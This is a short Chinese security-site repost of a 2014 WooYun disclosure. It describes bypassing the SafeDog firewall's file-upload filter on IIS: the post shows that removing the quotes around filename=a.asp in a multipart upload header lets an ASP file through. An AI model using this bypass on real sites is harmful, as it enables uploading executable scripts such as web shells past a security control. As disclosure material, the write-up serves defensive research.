热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

解析安全狗之文件上传绕过

发布时间:2014-03-03 13:12文章来源:wooyun文章作者:路人甲 点击次数:
摘要:通过特定方法是可以绕过安全狗的文件上传限制的 还是看看数据流先 network-iis-safedog-asp.dll 文件上传流是靠用户自己解析的,所以如果安全狗和asp.dll等扩展解析不一致就可以绕过了 ------WebKitFormBoundary2smpsxFB3D0KbA7D Content-Disposition:form-d...

通过特定方法是可以绕过安全狗的文件上传限制的


还是看看数据流先


network->iis->safedog->asp.dll

 

文件上传流是靠用户自己解析的,所以如果安全狗和asp.dll等扩展解析不一致就可以绕过了

 

 

  1. ------WebKitFormBoundary2smpsxFB3D0KbA7D 
  2.  
  3. Content-Disposition: form-data; name="filepath"filename="a.asp" 
  4.  
  5. Content-Type: text/html 

 


肯定被拦截

 

 

  1. ------WebKitFormBoundary2smpsxFB3D0KbA7D 
  2.  
  3. Content-Disposition: form-data; name="filepath"filename=a.asp 
  4.  
  5. Content-Type: text/html 

 

就不拦截鸟

标签分类:

上一篇:Shopwind网店系统管理后台验证绕过漏洞
下一篇:SupperRadius企业版V3.0 SQL注射漏洞